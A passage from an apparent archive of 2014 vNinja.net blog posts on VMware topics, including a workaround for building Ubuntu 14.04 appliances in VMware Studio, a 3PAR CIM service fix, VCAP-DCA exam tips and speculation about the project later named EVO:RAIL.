solid. As a physical form factor, it’s brilliant. As a quick delivery method for quite complex software, it’s amazing. Sadly all of this comes at a premium, a premium I’m unsure if the market is really willing to pay, at least not in it’s current iteration. --- # Nordic VMUG Conference 2014 URL: https://vNinja.net/virtualization/nordic-vmug-conference-2014/ Date: 2014-10-22 Author: christian Tags: Awesome, conference, Copenhagen, Denmark, VMUG, VMware Last year I was lucky enough to get to travel to Copenhagen and visit the Nordic VMUG conference. Sadly it doesn’t seem like I’ll be able to make it this year, but don’t let that stop you! While we in Norway are still trying to get our local VMUG up and running, more news on that in a very short while, the danish VMUG is really the driving force and the leading star for the rest of us in the nordics. Last years conference was awesome, and the 2014 edition looks no different. A quick glance at the agenda shows a bunch of familiar names: Frank Denneman, PernixData Kamau Wanguhu, VMware Duncan Epping, VMware Raymon Epping, Nutanix Chris Wahl, Ahead Paudie O’Riordan, VMware Cormac Hogan, VMware Shawn Bass, VMware Hugo Phan, Atlantis Computing The topics range from NSX, VMware vSphere futures, various storage topics, backup, security and flash acceleration. All in all, the line up and topics look great, seems that once again VMUG.dk is creating their own mini-VMworld in Copenhagen. It’s once again held in the Bella Center, the same venue that hosted VMworld EMEA back in 2010, when everyone complained about the cold weather and high prices. So, if you can, go register now. # I can guarantee you that you will not regret it, and I really wish I could join in this year as well.Perhaps next year, and I might even have a speaking slot then, who knows… --- # Building an Ubuntu 14.04 Appliance with VMware Studio 2.6 URL: https://vNinja.net/vmware-2/building-ubuntu-14-04-appliance-vmware-studio-2-6/ Date: 2014-10-07 Author: christian Tags: Appliance, Hack, Ubuntu, Unsupported, VMware Studio VMware Studio 2.6 was released way back in March 2012, and surprisingly there seems to be no new update in sight. While VMware Studio technically still works, even with newer versions of ESXi and vCenter, the supported operating systems for the appliances it can build is somewhat outdated: Red Hat Enterprise Linux 5.5/6.0 SUSE Linux Enterprise Server 10.2/11.1 Ubuntu 8.04.4/10.04.1 Windows Server 2003 R2 / 2008 R2 w/SP1 The Problem # For a yet to be announced project we are working on internally at EVRY, we needed to build an appliance that was based on newer software packages and development tools. Recent events like heartbleed and shellshock also highlight the need to build new appliances on new and supported distributions. Attempts at upgrading an existing Ubuntu 10.04.1 appliance to 14.04 failed miserably, due to architectural changes between the Ubuntu versions and how Virtual Appliance Management Infrastructure (VAMI) is installed by VMware Studio and in the end we were pretty much left to two options: Build the appliance from scratch, and lose VAMI, which was one of the primary reasons for building the appliance with VMware Studio in the first place. Find a way to build the appliance with Ubuntu 14.04, with VMware Studio. Option 1 felt a bit like giving up, and option 2, well that was a challenge we couldn’t just walk away from. The Solution # Thanks to the brilliant mind of my coworker Espen Ødegaard, we were able to come up with a set of solutions that does the trick. First we added a new profile to VMware Studio connecting to the VMware Studio VM via SSH, and by issuing the following command: studiocli --newos --osdesc "Ubuntu14.04” --profile /opt/vmware/etc/build/templates/ubuntu/10/041/build_profile.xml Basically this creates a new OS template in VMware Studio by copying the existing Ubuntu 10.04.1 profile. Next edit line 462 in /opt/vmware/etc/build/templates/Ubuntu14.04/Ubuntu14.04.xsl and change scd0 to sr0. if ! mount -t iso9660 -r /dev/scd0 /target/${cdrom_dir} ; then \ if ! mount -t iso9660 -r /dev/hda /target/${cdrom_dir} ; then \ cdrom_mounted=0; \ fi ; \ This fixes a problem with the appliance not being able to mount the Ubuntu installation iso when it is built. Place the Ubuntu 14.04 ISO in_ /opt/vmware/www/ISV/ISO_, and create a new Build profile using the VMware Studio Web Interface. Now, before an appliance can be built, we need to fix some other problems that prevent VAMI from starting up, and preventing login to the VAMI web interface. First of, make sure that libncurses5 is added as package under Application -> List of packages from OS install media. Next, add the following to the first boot script under OS->Boot Customization, we can move around those problems. # Create symlinks required for Ubuntu 14.04 and VAMI # Copy and symlink libncurses to the location VAMI looks for them cp /lib/i386-linux-gnu/libncurses.so.5.9 /opt/vmware/lib/ rm /opt/vmware/lib/libncurses.so.5 ln -s /opt/vmware/lib/libncurses.so.5.9 /opt/vmware/lib/libncurses.so.5 # Symlink PAM libraries in order for them to work with VAMI # This "unbreaks" authentication in the web interface mkdir /lib/security ln -s /lib/i386-linux-gnu/security/* /lib/security/ For details on how all of this works, and how to create build profiles, check the official VMware Studio documentation. The build process should now complete successfully, and you should have an Ubuntu 14.04 based appliance built with VMware Studio! Note that all of this is completely unsupported by VMware, and you are pretty much on your own. Hopefully there will be a new version of VMware Studio available soon, and we won’t have to rely on unsupported hacks to get it working with newer operating systems. --- # Is Hyperconverged the be-all, end-all? No. URL: https://vNinja.net/rant/hyperconverged-be-all-end-all-no/ Date: 2014-09-22 Author: christian Tags: Architecture, Future, Hyperconverged, Intel First off, this is not meant to be a post negating the value of current hyperconverged solutions available in the market. I think hyperconverged has it’s place, and for many use cases it makes perfect sense to go down that route. But the idea that everyone should go hyperconverged and all data should be placed on local drives, even if made redundant inside the chassis and even between chassis, is to be blunt, a bit silly. Parts of this post is inspired by a recent discussion on Twitter: @sudheenair @gallifreyan @jfrappier @Bacon_Is_King @mjm_973 all storage? Long term data too? I don't think so. — Christian Mohn™ (@h0bbel) September 20, 2014 I don’t believe that replacing your existing storage array with a hyperconverged solution, regardless of vendor, by moving your data off the array and on to the local disks in the cluster makes that much sense. Sure, keep your hot and fresh data set as close to the compute layer as possible, but for long time archiving purposes? For rarely accessed, but required data? Why would you do that? Of course, going hyperconverged would mean that you can free up some of that costly array space and leave long term retention data on the array, but does the hyperconverged solution of choice let you do that? Does it even have FC HBA’s? If not, is it cost effective to invest in it, while you at the same time need to keep your “traditional” infrastructure in place to keep all that data available? To quote Scott D. Lowe: Any solution that uses standalone storage is not hyperconverged. With a hyperconverged solution, every time a new node is added, there is additional compute, storage, and network capability added to the cluster. Simply adding a shelf of disks to an existing storage system does not provide linear scalability and can eventually lead to resource constraints if not managed carefully. Doesn’t that really show one of biggest the problems with a hyperconverged infrastructure? If you need to scale CPU, Memory AND Storage at the same time, it makes perfect sense. But what if you need to scale one of the items? Individually? Why should you have to buy more CPU, and licenses, if all you wanted was to add some more storage space? Of course, this brings the discussion right back to where it started, if you want to scale the various infrastructure components individually, then hyperconverged isn’t the right solution. But if hyperconverged isn’t the solution, and traditional “DIY” infrastructures have to many components to manage individually, then what? Sure, the Software Defined Data Center looks promising, but at the end of the day, we still need hardware to run the software on. The hardware may very well be generic, but it’s still required. Interestingly enough, a post by Scott Lowe (no, not the same one as quoted above), got me thinking about what the future might hold in this regard: Thinking About Intel Rack-Scale Architecture. To get to the point where we can manage a datacenter like a hyperconverged cluster, and still be able to scale vertically as needed, we need a completely new approach to the whole core architecture of our systems. Bundling CPU, Memory, Storage and Networking in a single manageable unit doesn’t cut it in the long run. Now that the workloads are (mostly) virtualized, it’s time to take a real hard look at how the compute nodes are constructed. Decoupling CPU, Memory, Storage Volume, Storage Performance and Network into entirely modular units that can be plugged in and scaled individually makes a whole lot more sense. By the looks of it Intel Rack-Scale Architecture might just be that, I guess we’ll see down the road if it´s actually doable. The software side of things are moving fast, and honestly, I’m kind of glad that hardware isn’t moving at the same pace. At least that gives us breathing room enough to actually think about what we’re doing, or at the very least pretend that we do. --- # Need the vSphere Client? VMware Has You Covered. URL: https://vNinja.net/vmware-2/vsphere-client-vmware-covered/ Date: 2014-09-17 Author: christian Tags: Download, ESXi, Knowledge Base, VMware, vSphere One of the more popular posts, currently in third place, on vNinja.net is my list of vSphere Client direct download links posted back in March 2012. Thankfully William Lam had the same idea, and got a new Knowledgebase Article published: Download URLs for VMware vSphere Client (2089791). Please use that article as the official download link documentation from now on. --- # My VCAP-DCA 550 Experience URL: https://vNinja.net/vmware-2/vcap-dca-550-experience/ Date: 2014-09-05 Author: christian Tags: Certification, VCAP, VCAP-DCA, VMware I finally took the plunge, and sat the VDCA550 exam yesterday. The VCAP5-DCA certification has been on my todo list way to long, and I’m glad I can now tick that box and move on. The VDCA550 exam is held in a live lab environment, with approximately 23 lab activities, which is the subsequently scored after the exam is finished. This means that you do not get an immediate pass/fail summary at the end of the exam, but you’ll be feverishly checking your email until the score report is sent to you from VMware. Preparation tips? # Hands-on experience. There is no substitute for real experience when it comes to this exam. It’s a lab and you need to be able to perform the tasks presented to you. No amount of reading will prepare you for that, unless it’s also accompanied by actually working with the products. VCAP5-DCA Official Cert Guide: VMware Certified Advanced Professional 5- Data Center Administration. I’ll be writing a more detailed review of the study guide later, but this book was invaluable for my preparation. Even if the book is mainly focused on the older VDCA510 exam, it also contains a chapter highlighting the changes in the blueprints between the 510 and 550 exams which was really helpful. The best part of the study guide is** Chapter 10: Scenarios** which goes through the certification blueprint and hands you specific tasks for each section. Get the book and do those, practicing will save you valuable time on exam day. Read the official vSphere documentation. End to end. Familiarize yourself enough with it, to the point that you know what keywords to search for if you get stuck on the labs. Exam tips # Time management. You get your allocated minutes, and that’s it. I was forcefully logged out of the lab environment as soon as the time ran out, and I had 4 labs left to complete at that time. Don’t get stuck on particular labs for disproportional amounts of time. If you get stuck on something, cut your losses and move on. You can always return to a lab later if you have time for it. It’s better to score a few points extra by completing other labs, rather than losing points on a lab you end up not finishing anyway. Open up the documentation and the knowledgebase in the lab browser. That speeds up searches, and if you know your way around those resources before you sit the exam, they can be a real lifesaver. As with “traditional” multiple choice exams, read the lab descriptions carefully. Some lab descriptions are very clear on what is the expected outcome, others are more subtle. Make sure you understand the task at hand before starting on it. The Exam # I really enjoyed it. No, seriously, I’m not kidding. This is the most fun I’ve ever had while actually working on obtaining a certification. The fact that you get to do real world administrative tasks, without multiple choice memory games was a refreshing experience. You still need to know your stuff, but since you have the vSphere documentation and VMware Knowledgebase available to you during the exam, you can look it up if needed. See Bullet #3 above. Working with the lab setup was a bit sluggish at times, especially when scrolling, something that require frequent screen updates, but not as bad as I thought it would be. I was really lucky, as the turn-around time for scoring of my exam was just shy of 30 minutes after finishing the exam, something that saved me a lot of agonising about my poor exam time management skills. One last thing: I really hope VMware Education opens the door for more test centers in Norway. I had to fly to Oslo from Bergen to sit the exam, something that drives the cost obtaining it dramatically higher. We have local test centers in Bergen, but they are not allowed to offer the advanced level exams from VMware. If I had the ability to sit this exam locally, Bergen is Norway’s second largest city after all, I probably would have done this a long time ago. I almost missed my exam when my morning plane was cancelled, and when I finally got to Oslo my taxi driver had problems finding the test center. I got there just in time though, but if I had got there much later, I would have set my employer back the exam fee, the plane tickets, a taxi bill AND a day of lost productivity. Of course, I could have flown in the day before, but that would have added hotel bills to the cost equation as well. --- # VMworld US is over. Now what? URL: https://vNinja.net/rant/vmworld-over-what/ Date: 2014-09-05 Author: christian Tags: Opinion, VMworld. Rant Another VMworld US is over, with huge attendee numbers and in keeping with tradition lots of new announcements were made. I’m not going to go through them, enough posts have been made about that, the basis of this post is something completely different all together. There seems to be a general expectation that we as a community is to be wooed by the announcements and flashy keynotes, but are we really the target audience? If you think about it, we probably aren’t. While we certainly like to think that we are the center of the universe, there is no factual evidence available to back that up. I think a lot of us who work for vendors, partners or even competitors seem to forget is that we live and breathe this stuff on a daily basis, and for the most part we actually have a pretty good idea what is going to be announced, and why. We participate in beta programs and in general have our fingers on the pulse 24/7, and still we expect to have general announcements cater to our own perceived reality. A reality that in many cases are years ahead of the real targets; the end users and customers. The announcements made at a conference like VMworld serve more than one purpose, but the main purpose is to generate buzz and interest in new products and services. We can talk about Software Defined Data Centers, with all its bells and whistles until we run out of breath. We can talk about All-Flash-Arrays and sub-millisecond latency until we turn blue, or proclaim that DevOps is the only true way to enlightenment, but is that the reality that our customers live in day to day? For the most part, I really don’t think that is the case. New product announcements, new services and new buzzwords has an effect, it generates revenue down the line when the customers and end-users in the real world catch up with the bleeding edge reality we as tech-oligarks live in. Reality The state of things as they actually exist, as opposed to an idealistic or notional idea of them. You may say “I reject your reality and substitute my own”, but that doesn’t help us in any way, shape or form. We are fortunate enough to live on the very bleeding edge of technology and we are actually in a position to help change the direction it takes in the future. Spend a minute and reflect on that. It’s kinda neat isn’t it? Don’t stop pushing the boundaries of what we can do, and how, just take a break now and then and put your ear on the tracks and listen. A train might be on it’s way, don’t get hit by it just because you didn’t bother checking. --- # It's official EVO:RAIL it is URL: https://vNinja.net/vmware-2/official-evorail/ Date: 2014-08-25 Author: christian Tags: Announcement, EVO, EVO:RAIL, Marvin, VMware, vmworld, Hyperconverged VMware has finally announced what I’ve been speculating about for some time now, EVO:RAIL was announced at VMworld US this morning. Short story; It’s a HCIA (HyperConverged Infrastructure Appliance), offered through several hardware vendors, with a new integrated management solution. Since I’m not at VMworld my self, I’ll leave the blog postings to those close to the action, but here is a quick collection of links to get you acquainted with the next EVOlution of SDDC from VMware: First off, have a look at Duncan Eppings post: Meet VMware EVO:RAIL™ – A New Building Block for your SDDC and be sure to check out the videos on the EVO:RAIL product page. It’s interesting how Duncan explains that Marvin was the code name for the team working on this, not the actual product. That’s one part that most speculation posts missed, including mine. Either way, Project Mystic + Marvin = EVO:RAIL. Other links # Introducing VMware EVO: RAIL EVO: Rail – Integrated Hardware and Software EVO: Rail – Management Re-imagined VMware Announces Software Defined Infrastructure with EVO:RAIL #VMworld Announcement #1 VMware EVO:RAIL – What is it? --- # #AdviceForVMworld URL: https://vNinja.net/rant/adviceforvmworld/ Date: 2014-08-22 Author: christian Tags: AdviceForVMworld, Rant, Venting, vmworld VMworld US is very soon upon us, and I’m one of the jealous ones left behind not being able to attend. I will hopefully be able to join everyone at VMworld Europe in Barcelona on October though. An interesting Twitter hashtag #AdviceForVMworld appeared a week or so ago, with lots of good advice for people attending a huge tech conference. Here are a few good examples: #AdviceForVMworld: Just Say Hi, it is all about the conversations, networking. — Texiwill (@Texiwill) August 11, 2014 #AdviceForVMworld Avoid fighting fires @ the show. Change freeze starts now for critical home labs & production environments. — Jason Boche (@jasonboche) August 18, 2014 #AdviceForVMworld while have a schedule for sessions, etc. do not be afraid to miss a session to continue a conversation! #VMworld — Texiwill (@Texiwill) August 18, 2014 All of these contain some good advice and make perfect sense. This has also spurred a very good log posts VMworld Mobile Toolchest by Justin Warren. This one, however, made me cringe and actually scared me quite a bit #AdviceForVMWorld double down on socks, shoes and underwear and go change between day & evening activities #VMworld — Haℕs De Leeℕheer (@HansDeLeenheer) August 18, 2014 Is the state of affairs so bad that there is a need to remind other human beings to change their underwear and take care of personal hygiene? After all, people who attend VMworld are largely people who are either responsible for running the IT infrastructure for large and small companies, or people who want to be in that position. Do we actually leave our Data Centers in the hands of people who needs this kind of advice? I know that the track record for tech conferences is shady,especially when it comes to how we as a collective treat women at such events, and that is simply disgraceful. The fact that we seem to have a need to tell people to wash, shower and clean themselves up in addition to not being misogynistic assholes saddens me. I have not personally witnessed any harassment at the VMworld’s I have attended, this is meant as a general comment. I guess my only real solid #AdviceForVMworld is this: Be human. Use your brain. Don’t be an asshole. If everyone does that, we’ll get along just fine. If not, I hope someone tells you to shut up and leave. --- # It's EVOlution Baby! URL: https://vNinja.net/vmware-2/evolution-baby/ Date: 2014-08-21 Author: christian Tags: EVO, Marvin, VMware, vmworld Finally. I’ve finally found a way to put two of my favourite things together in a completely non-sensical way, namely VMware Marvin and Pearl Jam. As The Register reported earlier today, odds are that Marvin no longer responds to it’s project name, but rather to the new EVO name recently trademarked by VMware. There has been whispers of a Marvin name change for quite some time, so this isn’t really hard to believe. I have also found three new Twitter accounts, which at the time of discovery only followed one other account namely @vmware: vmw evo rail vmw evo rack vmw evo rackscale So bring on Monday, this thing will be huge if it is what I think it is. And I think that it is. I think. So how does this tie in with Pearl Jam? It’s EVOlution, baby. --- # Problems connecting HP Insight Control Storage Module to StoreServ 7200 (3Par) URL: https://vNinja.net/storage-2/problems-connecting-hp-insight-control-storage-module-storeserv-7200-3par/ Date: 2014-08-21 Author: christian Tags: 3Par, HP, HP Insight Control, StoreServ, Troubleshooting, vCenter Operations Manager A customer of mine, who runs a pure HP environment based on c7000 and StoreServ 7200, wanted to get the HP Insight Control Storage Module for vCenter up and running. The problem was that while we were able to connect to the older MSA array they run for non-production workloads, we were unable to connect to the newer StoreServ 7200. There is full IP connectivity between the application server that the HP Insight components run on and the storage controllers/VSP (no firewalls between them, they are located in the same subnet). The only error message we got was an “unable to connect” message, when using the same credentials and ip address used for the 3Par Management Console. After reaching out to quite a few people, including Twitter, we finally found the solution. It turns out that the CIM service on the array was not responding, in fact it was disabled, which naturally resulted in not being able to connect. A quick ssh session to the array, revealed that the CIM service was disabled. login as: username Password: ************* 3par-array cli% showcim -Service- -State-- --SLP-- SLPPort -HTTP-- HTTPPort -HTTPS- HTTPSPort PGVer CIMVer Disabled Inactive Enabled 427 Enabled 5988 Enabled 5989 2.9.1 3.1.2 3par-array cli% stopcim Are you sure you want to stop CIM server? select q=quit y=yes n=no: y CIM server stopped successfully. 3par-array cli% startcim CIM server will start in about 90 seconds 3par-array cli% Restarting it fixed the issue, and we now have StoreServ data available directly in the vSphere Web (and C#) client. This also fixed the connection problem we had with vCenter Operations Manager and the The HP StoreFront Analytics adapter. So, if you are unable to connect to your StoreServ, check the CIM service - It might just be disabled. --- # Marvin Related VMworld Sessions? URL: https://vNinja.net/vmware-2/marvin-related-vmworld-sessions/ Date: 2014-08-20 Author: christian Tags: Hyperconverged, Marvin, SDDC, Speculation, vmworld It’s been a while since I tried speculating on the soon-to-be-announced VMware Marvin project, but some very recent VMworld US 2014 session additions look really interesting in that regard: SDDC1818 - VMware Customers Share Experiences and Requirements for Hyper-Converged SDDC2095 - VMware and Hyper-Converged Infrastructure SDDC1767 - SDDC at Scale with VMware Hyper-Converged Infrastructure: Deeper Dive SDDC3245-S - Software-Defined Data Center through Hyper-Converged Infrastructure If you look at 1767 specifically, since the other sessions are still very light on details, it has a rather interesting description: One way to simplify the CI environments is via a VMware-powered Converged Infrastructure solution (VMCI) that ties together hardware and software components under a single virtualization umbrella to offer a single point of-entry for a Software Define Data Center (SDDC). We will tie together VMware (and partner) assets spanning virtualization (compute/storage/networking), management (vCenter, VCAC), and operations/analytics (vCOPS, vCAC, etc) with hardware management, to offer a single point of SDDC entry with a tightly integrated automation for SDDC. I guess this is the real deal; a single point-of-entry for both hardware and software. It even mentions partners, which tie into my earlier speculation that VMware is not going into the hardware realm here, but rather working with OEMs. Now does this sound a lot like Marvin, or not? Update August 21st 2014 # A new session popped up today, with a rather conspicuous title (and great session number): SDDC1337 - VMware Hyper-Converged Infrastructure Technical Deepdive. Again, the session description is light on details, in fact at the moment the link to the session itself only returns _[Exception in:/detail/sessionDetail.jsp] null. _But, if you search for it, you get a bit more details: SDDC1337 - VMware Hyper-Converged Infrastructure Technical Deepdive In this session, Duncan Epping and Dave Shanley with provide technical details for VMware and Hyper-Converged Infrastructure. Dave Shanley - Lead Engineer, VMware Duncan Epping - Principal Architect, VMware Program Location: Europe and US It’s not even possible to schedule this session yet, as it’s time slots are not shown either. My guess is that it will be hidden until some time Monday morning (August 25th). Quite possibly right after, or even during, the 9:00AM - 10:30AM General Session. Seems you must be logged into vmworld.com and have a valid authenticated session to get all the details. Thanks Mike Laverick for clearing that part up. So, both @DuncanYB & @daveshanley in one go. Think Marvin, think EVOlution. Attend this one if you can. --- # PernixData vSphere Pocketbook Blog Edition URL: https://vNinja.net/virtualization/pernixdata-vsphere-pocketbook-blog-edition/ Date: 2014-08-12 Author: christian Tags: Book, fun, PernixData, vmworld Following the success of the first vSphere Design Pocketbook, PernixData has created a new version, this time dubbed “Blog Edition”. Where the first book focused on small “tweet sized” design tips, the new one allows for more in-depth articles, lifting the first editions 200 character limit. For some reason, I have been lucky enough to be selected as one of the contributors! You can pick up a printed copy at the PernixData Booth (1017) at VMworld US, or pre-order your electronic copy today. For more details, and a complete list of contributors, check Pre-order vSphere Pocketbook Blog Edition. Also, if you’re located in Norway, check out Arrows seminar with PernixData’s Frank Denneman on September 16th. Perhaps I’ll see you there? --- # This Week in Virtualization URL: https://vNinja.net/virtualization/week-virtualization/ Date: 2014-07-18 Author: christian Tags: Audio, Podcast I was invited by Nick Martin and Tom Walat to join them in this pre-VMworld edition of the podcast, so if you’re not bored reading about my Marvin speculations already, you can now listen to them as well over at This Week in Virtualizationby SearchServerVirtualization. It also covers some expectation for VMworld 2014, which is rapidly getting closer. --- # Root Cause of Invalid memory setting: memory reservation (sched.mem.min) should be equal to memsize (memsize) URL: https://vNinja.net/vmware-2/root-invalid-memory-setting-memory-reservation-sched-mem-min-equal-memsize-memsize/ Date: 2014-07-15 Author: christian Tags: 5.5, ESXi, Latency Sensitivity, Troubleshooting, vCenter, VM, VMware While working on reconfiguring my home lab setup, and migrating all the vSphere resources into a single cluster I ran into a problem powering on one of the VMs which used to run on a single host. The power on operation yielded the following error message: Invalid memory setting: memory reservation (sched.mem.min) should be equal to memsize (memsize) Task Details: Status: Invalid memory setting: memory reservation (sched.mem.min) should be equal to memsize(4096). Error Stack: An error was received from the ESX host while powering on VM MinecraftServer. Failed to start the virtual machine. Module MemSched power on failed. An error occurred while parsing scheduler-specific configuration parameters. Invalid memory setting: memory reservation (sched.mem.min) should be equal to memsize(4096). Additional Task Details: VC Build: 1476327 Error Type: GenericVmConfigFault Task Id: Task Cancelable: false Canceled: false Description Id: Datacenter.ExecuteVmPowerOnLRO Event Chain Id: 20017 Clearly there was an issue with memory reservations on the VM, but there was no memory reservation enabled on it at all, nor should there be. The only related errors I found while investigating the issue, was with regards to pass-through devices, which also did not apply in this case. It turns out that the problem was due to the VM was configured to use the latency sensitivity feature introduced in vSphere 5.5. The Deploying Extremely Latency-Sensitive Applications in VMware vSphere 5.5 whitepaper from VMware clearly states that usage of this feature also demands a memory reservation being set on the VM, and this VM had no reservation. In the end, the solution was a simple one, revert the latency sensitivity advanced option for the VM to the default value of Normal let me power-on the VM again without issues. The error message received in vCenter could be a lot clearer though, and a knowledge base article with the exact error message and resolution paths might be in order. It was not immediately obvious that the lack of memory reservation error message was related to the latency sensitivity settings for the given VM. The vSphere Web Client shows a warning that you should check the CPU reservations, but does not mention memory reservations when you enable this feature. Now I just need to figure out why my home MineCraft server had that setting enabled in the first place… --- # Disaster Recovery using VMware vSphere Replication and vCenter Site Recovery Manager eBook Winners URL: https://vNinja.net/virtualization/disaster-recovery-vmware-vsphere-replication-vcenter-site-recovery-manager-ebook-winners/ Date: 2014-07-07 Author: christian Tags: Packt Publishing has picked two winners in the Disaster Recovery using VMware vSphere Replication and vCenter Site Recovery Manager eBook contest. The lucky winners are : Dee Abson (@deeabson) and James Kilby (@jameskilbynet). Congratulations, Packt Publishing will be in touch with you ASAP. --- # Win a eBook Copy of Disaster Recovery using VMware vSphere Replication and vCenter Site Recovery Manager URL: https://vNinja.net/news/win-ebook-copy-disaster-recovery-vmware-vsphere-replication-vcenter-site-recovery-manager/ Date: 2014-06-20 Author: christian Tags: Book, contest, fun, Packt, Site Recovery Manager, VMware, vSphere Replication Hot off the heals of the Veeam® Backup & Replication for VMware vSphere giveaway, here is another one for you! Win a free eBook copy of Disaster Recovery using VMware vSphere Replication and vCenter Site Recovery Manager, just by commenting! For the contest I have 2 eBook copies to be given away to 2 lucky winners. How you can win # To win your eBook copy of this book, all you need to do is come up with a comment below highlighting the reason why you would like to win this book! Duration of the contest & selection of winners # The contest is valid for 2 weeks, it ends on the 4th of July and is open to everyone. Winners will be selected, by Packt Publishing, on the basis of their comment posted. About the book # This is a step-by-step guide that will help you understand disaster recovery using VMware vSphere Replication 5.5 and VMware vCenter Site Recovery Manager (SRM) 5.5. The topics and configuration procedures are accompanied with relevant screenshots, flow-charts, and logical diagrams that makes grasping the concepts easier. This book is a guide for anyone who is keen on using vSphere Replication or vCenter Site Recovery Manager as a disaster recovery solution. This is an excellent handbook for solution architects, administrators, on-field engineers, and support professionals. Although the book assumes that the reader has some basic knowledge of data center virtualization using VMware vSphere, it can still be a very good reference for anyone who is new to virtualization. So go ahead, leave a comment and win a copy! --- # Learning Veeam Backup & Replication for VMware vSphere Book Winners URL: https://vNinja.net/news/learning-veeam-backup-replication-vmware-vsphere-book-winners/ Date: 2014-06-20 Author: christian Tags: Book, contest, Veeam, Winners Packt Publishing has picked three lucky winners for the Veeam® Backup & Replication for VMware vSphere book. The winners are as follows, with the winning comments: Chris Childerhose: Wow nice to see a book come out for Veeam. Look forward to the following things from this book to help better my Veeam skills - Install and manage a Veeam® Backup & Replication v7 infrastructure Discover how to back up and restore data in virtual environments Utilize WAN acceleration to speed up backup to remote locations Understand what options are available for Veeam® Backup & Replication, and how to configure these options These topics will help further my skills with Veeam. Hopefully I win the book too. VirtuallyMikeB: Being new to Veeam, it’s nice to see a book dedicated to it. There aren’t many VMware books associated with third-party products. I also see it’s written by this fella named Christian Mohn of vSoup and vCommunity fame. This is the biggest selling point of the book in my opinion. But if I were to explain why I’d like a copy of the book based on its contents, I’d say that it’s sure to be an excellent primer on Veeam Backup and Replication. Since I’ve never used it before, I’d be left to stumble around the interface in a test lab to figure out how to use it without a guide like this. I glean a lot from reading (hands on, too, of course) and this book would probably help me learn the product in the shortest amount of time possible. Thanks, Mike Adam Robinson: I am looking forward to getting more WAN-accel information as well as the U-AIR capability. Both topics are of high interest for an upcoming project! Congratulations, and I hope you’ll enjoy the book! --- # Is Marvin an Acronym? URL: https://vNinja.net/vmware-2/marvin-acronym/ Date: 2014-06-10 Author: christian Tags: HyperConverged, Marvin, Speculation, VMware The recent speculations surrounding Marvin has now hit The Register (to bad they don’t link this way, but I guess thats how it is) as well, but one piece is still missing, arguably the most important one. We all know that the most important piece of something like this is it’s name, or acronym, not it’s technical merit… There has been a few attempts at guessing what Marvin is an acronym for, and here are some good ones from Twitter: @alaricdavies @ROIdude @alaricdavies Made-up Architecture Reference Virtual Infrastructure Node? #marvin — Jane Rimmer (@Rimmergram) June 10, 2014 .@ROIdude @Rimmergram MARVIN = Something Something Reference Virtual Infrastructure Node? #vmware #marvin — Alaric Davies (@alaricdavies) June 10, 2014 As well as Modular ARray of Virtualization Infrastructure Nodes by Kevin Kelling. How about this one: Modular Automated Rackable Virtual Infrastructure Node? I’m bored. — Marvin, the Paranoid Android Update January 12th 2021: # The Acronym was in fact Modular Automated Rackable Virtual Infrastructure Node. So my speculation was actually spot on, and it was indeed an acronym as suspected at the time. It’s good to have that sorted over 6 years later, isn’t it? You know, for historical accuracy and all that. Reference # Actually, it was: Modular Automated Rackable Virtual Infrastructe Node... — Duncan Epping (@DuncanYB) January 12, 2021 --- # NSX for vSphere 6.0.4 - Documentation and Download? URL: https://vNinja.net/vmware-2/nsx-vsphere-6-0-4-documentation-download/ Date: 2014-06-10 Author: christian Tags: Availability, Download, Networking, NSX, WhatsUp? How long as NSX for vSphere 6.0.4 Documentation been publicly available? I just noticed this, and that the NSX downloads seem to be available via MyVMware - If you are entitled to it that is. Does this mean it will be available for download and we get to play with it soon-ish? It might have been available earlier too, unnoticed by yours truly… --- # Win Free e-copies of Learning Veeam® Backup & Replication for VMware vSphere URL: https://vNinja.net/book/win-free-e-copies-learning-veeam-backup-replication-vmware-vsphere/ Date: 2014-06-09 Author: christian Tags: Backup & Replication, Book, contest, fun, Veeam Update: The contest is now closed, and I have forwarded all comments to Packt Publishing, and they will contact the winners directly. Thanks to everyone who entered! I have teamed up with Packt Publishing to organize a giveaway of my new **Veeam® Backup & Replication for VMware vSphere **book. 3 lucky winners stand a chance to win e-copies of their new book. Keep reading to find out how you can be one of them! Overview # Explore Veeam Backup and Replication v7 infrastructure and its components Create backup, replication, and restore strategies that protect data, your company’s most valuable asset Includes advanced features like off-site replication and tape retention How to Enter # All you need to do is head on over to the book page and look through the product description and drop a line via the comments below this post to let us know what interests you the most about this book. It’s that simple! The winner will be picked by a representative from Packt Publishing. Deadline # The contest will close on June 15th. The winners will be contacted by email, so be sure to use your real email address when you comment!** Contest is now closed. --- # Some more Marvin Speculation URL: https://vNinja.net/vmware-2/marvin-speculation/ Date: 2014-06-08 Author: christian Tags: Hyperconverged, Marvin, SDDC, Speculation, VMware Marvin the Paranoid Android (HHGG) After close to a full day of Twitter speculations and discussions on what Marvin really is, some thoughts kept stuck with me, and this is my attempt at articulating what I think VMware might be up to. Please note that I have no real knowledge of the status of the project, nor if it really exists outside of a poster in a window in the VMware campus. All I do know is that there is a trademark registered, and that there seems to be some merit behind the speculations done by CRN and The Register. There is one little tidbit in the trademark registration that has caused more than a few people to raise their eyebrows: Computer hardware for virtualization; computer hardware enabling users to manage virtual computing resources that include networking and data storage That’s right, it mentions hardware! Does that mean that VMware is going to start building their own hardware, or OEM it from someone? I really don’t think that is the case. As far as I can gather, Marvin is more than a single physical hyper-converged hardware platform, with known VMware bits on top, sprinkled with some new management interface. Pinning this appliance model to a single vendor, like Nutanix does with their Super Micro chassis and components, is not how VMware usually operates. I don’t even think it’s part of VMware’s DNA to limit Marvin to a single hardware vendor, even if EMC is their biggest stock holder. I think the key here is to think of Marvin as a standard for building hyper-converged solutions. Build nodes to spec, and VMware will certify them for Marvin. Imagine that? You can probably mix and match nodes from different vendors, in the same “MarvinMatrix”. We’ve already seen VSAN Ready Nodes, why not build Marvin Ready Nodes (for some reason I think VMware marketing might just come up with a better term come launch time…). Dell and Super Micro seem likely candidates, but how about Intel nodes? I am fairly sure that there are people within VMware, and The Federation, that has pretty good ties in that direction. The possibilities here are pretty awesome, just like they are with existing hyper-converged solutions. Need more compute? Stick in another node into your network “matrix”, import it and it auto-configures itself based on whatever policy you have active. Need more storage, well, do the same thing. Add a new node, or just stick in a few more flash or hard drives into your existing chassis. We all know this is going to be based on vSphere and VSAN, but there are other components that are yet left open for speculation: What about networking? We know VMware is pushing NSX, and we know they are working on making a smaller scale installation easier to implement. Given the time-frame we are looking at, namely next summer (read VMworld), I doubt that NSX will be a part of the first revision. Perhaps it’s going to be Arista at that point? The second thing is the magic sauce that will tie everything together, and I have a feeling that this is where VMware’s Marvin team members is really focusing its attention these days. A solution like this, if my speculations are right, really needs a good management solution if it is to really deliver on what it seems to promise, namely a Software Defined Data 